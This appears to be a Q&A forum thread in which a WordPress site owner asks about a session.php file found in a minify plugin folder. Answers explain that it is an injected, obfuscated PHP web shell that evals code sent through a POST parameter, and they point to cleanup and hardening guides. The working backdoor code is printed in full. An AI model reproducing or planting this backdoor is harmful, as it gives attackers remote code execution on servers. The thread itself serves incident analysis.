# What does this PHP session.php mean and why did OVH, my hosting provider, shut down my site because of it?

Tags: php, wordpress

```
<?php                                                                                                                                                           $qV="stop_";
    $s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);
    if(isset(${$s20}['q79c1ec']))
    {
       eval(${$s20}['q79c1ec']);
    }
?>
```

https://wordpress.org/plugins/bwp-minify/

within the path plugins/bwp-minify/min/lib/minify/js/session.php

Comment: It seems that your site has been hacked and this code has been injected to one of your files.

Answer (score 0):

If you download and check the plug in from https://wordpress.org/plugins/bwp-minify/ you can see there is no session.php file in the archive.

Someone injected session.php in your file system.

The script is trying to execute any php code with eval function. This is for sure a security issue and that's why your provider shut down your website.

What does the code do;
It tries to use $_POST['q79c1ec'] variable and run any php code by posting variables to your web server.

If you debug the code you can see, `$s20 = "_POST"` and eval line is executed like, `eval($_POST['q79c1ec']);`

Answer (score 0):

The `session.php` file is not a valid WordPress core or plugin file, and the code itself is a hacking exploit.

Carefully follow [FAQ - My Site Was Hacked - WordPress Codex](https://codex.wordpress.org/FAQ_My_site_was_hacked).

Then take a look at the recommended security measures in [Hardening WordPress](https://codex.wordpress.org/Hardening_WordPress) and [Brute Force Attacks](http://codex.wordpress.org/Brute_Force_Attacks) in the WordPress Codex.

Change all passwords. Scan your own PC. Tell your web host you got hacked; and consider changing to a more secure host: [Recommended WordPress Web Hosting - WordPress Codex](http://wordpress.org/hosting/)